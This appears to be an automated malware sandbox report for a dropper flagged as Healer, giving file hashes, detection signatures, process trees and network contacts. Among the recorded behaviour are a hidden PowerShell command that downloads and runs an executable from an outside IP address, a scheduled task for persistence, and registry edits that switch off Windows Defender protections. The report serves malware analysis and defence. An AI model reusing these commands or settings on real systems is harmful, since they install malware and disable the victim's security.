SHA512 c39d9a546cdb14722e1a5f1bcbc5fdf2ddc0e5d57a7ada39a7583c13275dbcad90717c16e505c0b34952e67b1073b18ac235f99a616501bb04be3f90d3ef855f

memory/197036-1073-0x0000000000270000-0x000000000074E000-memory.dmp

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\2psyjw2x.default-release\datareporting\glean\pending_pings\929bd9d6-09d9-4b86-bb92-6bfc294d8f29

MD5 54a55a2fc4d066ff6155c7f339894653
SHA1 dccbc4c9a9bf3782c5b6ba4e0d6f55d638fcb0c0
SHA256 2b20262bb626975f8ff9c1bb64a456d8600e7a121912153078c3e94fd5d57e07
SHA512 e69fbef6d25fde9bf7eadeba56dee686508c0c2422f67dd657bb844169c076c5ccdef99fe968b69469d6db73cdecf6321fc65c3ddcb5c14a64a3686083073410

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\2psyjw2x.default-release\datareporting\glean\db\data.safe.tmp

MD5 d99319b8a448f26e6263ba9fef7b3214
SHA1 2d89af980ae5c736c3b2599df2bdbea2f589f1fe
SHA256 6dfc4472233fa35222a2fa154f4419d9a0fef7bd290bca9128d48da6ed65e3d1
SHA512 9dd3b255addbafe585441a0c066083da0eab0eaff2429359b74755d0a88fcb1bb09cb6aad3f70614bd249aee22aadd044aca43d4e7092fb9626701073459c93a

memory/145836-614-0x0000000000270000-0x000000000074E000-memory.dmp

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\2psyjw2x.default-release\datareporting\glean\pending_pings\400728a6-acbc-4eaf-9147-cb4bf1e9f280

MD5 b462ee123f50042f22bc092d8bbcdedf
SHA1 322de16078732337e87c5c358717ff00e266bfdf
SHA256 083191dfcebc1136654337b6087f2ab85a860dde20f3557b2e9058410ab97c31
SHA512 1daf59bd573a695da9a7889f87d94342eb2bb912686dd5da206ee54b4cee21771eae5cff4831f71baf8b7c951292b9cc6bc9f8c3d7ea3985c64afb563987b4cb

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\2psyjw2x.default-release\datareporting\glean\db\data.safe.bin

MD5 8a49a407c2b61451bdd56a0ba11a1e43
SHA1 e17f2666ca48a661e4edc56896d894dcb89e8618
SHA256 52dcfe3d7293113bf2efa80153135b3f8120a29daf73588444b474215bf87060
SHA512 07ab3689dd6b7eb565c275dd883c983c465c4c5351000d09bb4d328f886a881afe7d71baab2e4e17efc92b5a903d1633475e6fd6cd01c06adab34f66f1c77fd6

C:\Users\Admin\AppData\Local\Temp\10036510101\a68f071a5f.exe

MD5 e551ee3c02e04a54815f4a7425823acb
SHA1 0c737ab4bc14a7ba1865937339e0d2a9a214b9e1
SHA256 81227bc4b3aaa4ca09473f192bff56186c3f89e11899ca6ea1289412fa90b657
SHA512 090708de73e923f443436b44ff27158d02381552bc952c4a2d06fbd441ba9134dcf1418aa403918632c233e466df8a39b67203ee378d2cb686cb3bde9c5c937a

memory/213508-1274-0x0000000000FA0000-0x00000000013F4000-memory.dmp

memory/213508-1273-0x0000000000FA0000-0x00000000013F4000-memory.dmp

memory/213508-1267-0x0000000000FA0000-0x00000000013F4000-memory.dmp

memory/160076-1275-0x0000000000400000-0x000000000087F000-memory.dmp

memory/145836-1277-0x0000000000270000-0x000000000074E000-memory.dmp

memory/198316-1279-0x0000000000400000-0x000000000087F000-memory.dmp

memory/198316-1278-0x0000000000400000-0x000000000087F000-memory.dmp

memory/213508-1287-0x0000000075870000-0x0000000075AF4000-memory.dmp

memory/213508-1288-0x0000000000FA0000-0x00000000013F4000-memory.dmp

memory/213508-1291-0x0000000000FA0000-0x00000000013F4000-memory.dmp

memory/160076-1292-0x0000000000400000-0x000000000087F000-memory.dmp

memory/3920-1293-0x0000000081910000-0x0000000081A15000-memory.dmp

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\2psyjw2x.default-release\datareporting\glean\db\data.safe.bin

MD5 0351250f666cc216c5ac3f81a1233ea8
SHA1 915dfbf1b7dfafa5031a83eb2553ecec152f2622
SHA256 ff1829f19b04afd7e85ebff1d5e964ea26a920aaa4b5e81124d3475f0b00488b
SHA512 45dad332a6d06d24e0b541d9d6455e320181740ebf2e2809e538b14797a11e494fb14b49453ed8502699127c4bd0674a5058b701a50faaf26bd87987f6e6d79e

memory/145836-1320-0x0000000000270000-0x000000000074E000-memory.dmp

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\2psyjw2x.default-release\prefs-1.js

MD5 c95708a76cf10548c9967a5832840174
SHA1 24ea99bbd2af770fc3e6f77d107ddc20d7e65a36
SHA256 1994942f49bbaa4bcd166d943effed49761fe095775aaf0d5447376038959bcf
SHA512 3669f63455b38ffaffbe8937c46ad53b8ea2a24d10922b4e802cb936d4c0f43e941b54aa5d5a365e4ce269bf30203b82e408e38a925b781ee5c02fe55fcaff6a

memory/198316-1335-0x0000000000400000-0x000000000087F000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\tmpaddon

MD5 09372174e83dbbf696ee732fd2e875bb
SHA1 ba360186ba650a769f9303f48b7200fb5eaccee1
SHA256 c32efac42faf4b9878fb8917c5e71d89ff40de580c4f52f62e11c6cfab55167f
SHA512 b667086ed49579592d435df2b486fe30ba1b62ddd169f19e700cd079239747dd3e20058c285fa9c10a533e34f22b5198ed9b1f92ae560a3067f3e3feacc724f1

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\2psyjw2x.default-release\gmp-gmpopenh264\2.3.2\gmpopenh264.info

MD5 2a461e9eb87fd1955cea740a3444ee7a
SHA1 b10755914c713f5a4677494dbe8a686ed458c3c5
SHA256 4107f76ba1d9424555f4e8ea0acef69357dfff89dfa5f0ec72aa4f2d489b17bc
SHA512 34f73f7bf69d7674907f190f257516e3956f825e35a2f03d58201a5a630310b45df393f2b39669f9369d1ac990505a4b6849a0d34e8c136e1402143b6cedf2d3

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\2psyjw2x.default-release\gmp-gmpopenh264\2.3.2\gmpopenh264.dll

MD5 842039753bf41fa5e11b3a1383061a87
SHA1 3e8fe1d7b3ad866b06dca6c7ef1e3c50c406e153
SHA256 d88dd3bfc4a558bb943f3caa2e376da3942e48a7948763bf9a38f707c2cd0c1c
SHA512 d3320f7ac46327b7b974e74320c4d853e569061cb89ca849cd5d1706330aca629abeb4a16435c541900d839f46ff72dfde04128c450f3e1ee63c025470c19157

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\2psyjw2x.default-release\cache2\entries\ADF5BD09EB688DAB1F35EE02E8C35329D0E4AD89

MD5 d29a06318217f7c664a8912ea7c70a9b
SHA1 88a40e984c676a56fcb2eaa8db279f69390d6cce
SHA256 230a751d038f492054d303390f27e5b8c3f4afd0a2961ab62d316de1428a2a66
SHA512 3d291964fc014aee9ca433d48394104ae30086ae2b6edea3f3983f898883303c91a1604dbef465cf620de7732ec0a19c927f75eb40c64783f4832986d7cd5db7

C:\Users\Admin\AppData\Local\Temp\tmpaddon-1

MD5 0a8747a2ac9ac08ae9508f36c6d75692
SHA1 b287a96fd6cc12433adb42193dfe06111c38eaf0
SHA256 32d544baf2facc893057a1d97db33207e642f0dacf235d8500a0b5eff934ce03
SHA512 59521f8c61236641b3299ab460c58c8f5f26fa67e828de853c2cf372f9614d58b9f541aae325b1600ec4f3a47953caacb8122b0dfce7481acfec81045735947d

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\2psyjw2x.default-release\gmp-widevinecdm\4.10.2710.0\widevinecdm.dll

MD5 daf7ef3acccab478aaa7d6dc1c60f865
SHA1 f8246162b97ce4a945feced27b6ea114366ff2ad
SHA256 bc40c7821dcd3fea9923c6912ab1183a942c11b7690cfd79ed148ded0228777e
SHA512 5840a45cfdb12c005e117608b1e5d946e1b2e76443ed39ba940d7f56de4babeab09bee7e64b903eb82bb37624c0a0ef19e9b59fbe2ce2f0e0b1c7a6015a63f75

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\2psyjw2x.default-release\gmp-widevinecdm\4.10.2710.0\manifest.json

MD5 bf957ad58b55f64219ab3f793e374316
SHA1 a11adc9d7f2c28e04d9b35e23b7616d0527118a1
SHA256 bbab6ca07edbed72a966835c7907b3e60c7aa3d48ddea847e5076bd05f4b1eda
SHA512 79c179b56e4893fb729b225818ab4b95a50b69666ac41d17aad0b37ab0ca8cd9f0848cbc3c5d9e69e4640a8b261d7ced592eae9bcb0e0b63c05a56e7c477f44e

memory/160076-1626-0x0000000000400000-0x000000000087F000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10036560101\a436e04ae1.exe

MD5 f9ff1782c634319b0faf726e9910f592
SHA1 bcd481deb29fde172fe9631f79a386da9a9067db
SHA256 fe80c165e1a9aa7009013df5372b491bf5612564b327cfa7ca5b2df987da172c
SHA512 1446c9db289ae66bc176dc8f0d19920798bebc6949a773ba9ec4b879fe1eb6d45f16a2de9366e44c981ab1701ac83b2a0bcc9352f9d594d861324b33ef8b85d1

memory/6432-1785-0x0000000000B40000-0x0000000001571000-memory.dmp

memory/145836-2085-0x0000000000270000-0x000000000074E000-memory.dmp

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\2psyjw2x.default-release\prefs-1.js

MD5 dd8ab4daeca19af3048bf8dc012acdaf
SHA1 84340c31209458928b0df62703e6376078bd96b0
SHA256 b9fb9dfdff87b434e0bb65b0e1d4fe2aee1496e50672932215b5ff4ae2791876
SHA512 ed4ac62b8b3090a7db894b067bee9d1fe9bb39d9418bab16e7101b3d84121e5387d07d63390218db1bae373d97c72dcc391ca05a070aeeb012cc9e2768ff2abf

Analysis: behavioral26

Detonation Overview

Submitted: 2025-02-26 23:45

Reported: 2025-02-26 23:48

Platform: win10v2004-20250217-en

Max time kernel: 145s

Max time network: 151s

Command Line

"C:\Users\Admin\AppData\Local\Temp\quarantine\random.exe"

Signatures

Detects Healer an antivirus disabler dropper

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Healer

dropper healer

Healer family

healer

Modifies Windows Defender DisableAntiSpyware settings

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" C:\Users\Admin\AppData\Local\TempZ0BKADDPIDETYJS4LMMEBROYPPGJFSWC.EXE N/A

Modifies Windows Defender Real-time Protection settings

defense_evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Users\Admin\AppData\Local\TempZ0BKADDPIDETYJS4LMMEBROYPPGJFSWC.EXE N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" C:\Users\Admin\AppData\Local\TempZ0BKADDPIDETYJS4LMMEBROYPPGJFSWC.EXE N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" C:\Users\Admin\AppData\Local\TempZ0BKADDPIDETYJS4LMMEBROYPPGJFSWC.EXE N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" C:\Users\Admin\AppData\Local\TempZ0BKADDPIDETYJS4LMMEBROYPPGJFSWC.EXE N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" C:\Users\Admin\AppData\Local\TempZ0BKADDPIDETYJS4LMMEBROYPPGJFSWC.EXE N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" C:\Users\Admin\AppData\Local\TempZ0BKADDPIDETYJS4LMMEBROYPPGJFSWC.EXE N/A

Modifies Windows Defender TamperProtection settings

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" C:\Users\Admin\AppData\Local\TempZ0BKADDPIDETYJS4LMMEBROYPPGJFSWC.EXE N/A

Modifies Windows Defender notification settings

defense_evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender Security Center\Notifications C:\Users\Admin\AppData\Local\TempZ0BKADDPIDETYJS4LMMEBROYPPGJFSWC.EXE N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications = "1" C:\Users\Admin\AppData\Local\TempZ0BKADDPIDETYJS4LMMEBROYPPGJFSWC.EXE N/A

Identifies VirtualBox via ACPI registry values (likely anti-VM)

defense_evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\TempZ0BKADDPIDETYJS4LMMEBROYPPGJFSWC.EXE N/A

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Downloads MZ/PE file

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\TempZ0BKADDPIDETYJS4LMMEBROYPPGJFSWC.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\TempZ0BKADDPIDETYJS4LMMEBROYPPGJFSWC.EXE N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\mshta.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\TempZ0BKADDPIDETYJS4LMMEBROYPPGJFSWC.EXE N/A

Identifies Wine through registry keys

defense_evasion
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000\Software\Wine C:\Users\Admin\AppData\Local\TempZ0BKADDPIDETYJS4LMMEBROYPPGJFSWC.EXE N/A

Windows security modification

defense_evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features C:\Users\Admin\AppData\Local\TempZ0BKADDPIDETYJS4LMMEBROYPPGJFSWC.EXE N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" C:\Users\Admin\AppData\Local\TempZ0BKADDPIDETYJS4LMMEBROYPPGJFSWC.EXE N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\TempZ0BKADDPIDETYJS4LMMEBROYPPGJFSWC.EXE N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\quarantine\random.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\TempZ0BKADDPIDETYJS4LMMEBROYPPGJFSWC.EXE N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\TempZ0BKADDPIDETYJS4LMMEBROYPPGJFSWC.EXE N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3416 wrote to memory of 2088 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\random.exe C:\Windows\SysWOW64\cmd.exe
PID 3416 wrote to memory of 2088 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\random.exe C:\Windows\SysWOW64\cmd.exe
PID 3416 wrote to memory of 2088 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\random.exe C:\Windows\SysWOW64\cmd.exe
PID 3416 wrote to memory of 4664 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\random.exe C:\Windows\SysWOW64\mshta.exe
PID 3416 wrote to memory of 4664 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\random.exe C:\Windows\SysWOW64\mshta.exe
PID 3416 wrote to memory of 4664 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\random.exe C:\Windows\SysWOW64\mshta.exe
PID 2088 wrote to memory of 3836 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 2088 wrote to memory of 3836 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 2088 wrote to memory of 3836 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 4664 wrote to memory of 1636 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4664 wrote to memory of 1636 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4664 wrote to memory of 1636 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1636 wrote to memory of 3956 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\TempZ0BKADDPIDETYJS4LMMEBROYPPGJFSWC.EXE
PID 1636 wrote to memory of 3956 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\TempZ0BKADDPIDETYJS4LMMEBROYPPGJFSWC.EXE
PID 1636 wrote to memory of 3956 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\TempZ0BKADDPIDETYJS4LMMEBROYPPGJFSWC.EXE

Processes

C:\Users\Admin\AppData\Local\Temp\quarantine\random.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\random.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c schtasks /create /tn m8rnJmaSDYN /tr "mshta C:\Users\Admin\AppData\Local\Temp\z9ag2CxxB.hta" /sc minute /mo 25 /ru "Admin" /f

C:\Windows\SysWOW64\mshta.exe

mshta C:\Users\Admin\AppData\Local\Temp\z9ag2CxxB.hta

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /tn m8rnJmaSDYN /tr "mshta C:\Users\Admin\AppData\Local\Temp\z9ag2CxxB.hta" /sc minute /mo 25 /ru "Admin" /f

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'Z0BKADDPIDETYJS4LMMEBROYPPGJFSWC.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/defend/random.exe',$d);Start-Process $d;

C:\Users\Admin\AppData\Local\TempZ0BKADDPIDETYJS4LMMEBROYPPGJFSWC.EXE

"C:\Users\Admin\AppData\Local\TempZ0BKADDPIDETYJS4LMMEBROYPPGJFSWC.EXE"

Network

Country Destination Domain Proto
US 8.8.8.8:53 g.bing.com udp
US 150.171.28.10:443 g.bing.com tcp
RU 185.215.113.16:80 185.215.113.16 tcp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp

Files

C:\Users\Admin\AppData\Local\Temp\z9ag2CxxB.hta

MD5 44603a17e88571be0341a88cf5b93739
SHA1 7d2e4ce90d0e511daafd865911e5c1d022445d03
SHA256 0e180f61817e84789dd2e3489926cf0089e6d206166cf360790417c4c0b3430e
SHA512 23b68fc617e4f0b0bca41642964b456fa71357d38cf05b399d6010169e185ad680ac44b2b913d09ba8f9da14ad101bc9be77b83e03fe89f46371b31adde0f185

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_mifqjibe.xue.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Admin\AppData\Local\TempZ0BKADDPIDETYJS4LMMEBROYPPGJFSWC.EXE

MD5 03a574d64f0e62c5e117a5f5acf137e4
SHA1 93ba2b5bdac91342c9eeaeaf3e44cc1793ee6d90
SHA256 dcc540b3c86a167bb0cf71e8d4598f7566fe0f625d64ffe7a37f0d5f502be747
SHA512 d1b76d82c522ccb157dcd5155011619b36baf3516cf08cb6bc98fb9bc009230e5c53d77f5d8adc0e85dde678b4b3542823919ee6490533df8250078caca1b9b1

Analysis: behavioral29

Detonation Overview

Submitted

2025-02-26 23:45

Reported

2025-02-26 23:48

Platform

win7-20240903-en

Max time kernel

121s

Max time network

122s

Command Line

"C:\Users\Admin\AppData\Local\Temp\quarantine\xqWgymz.exe"

Signatures

N/A

Processes

C:\Users\Admin\AppData\Local\Temp\quarantine\xqWgymz.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\xqWgymz.exe"

Network

N/A

Files

memory/2296-0-0x000000013F250000-0x000000013F3FE000-memory.dmp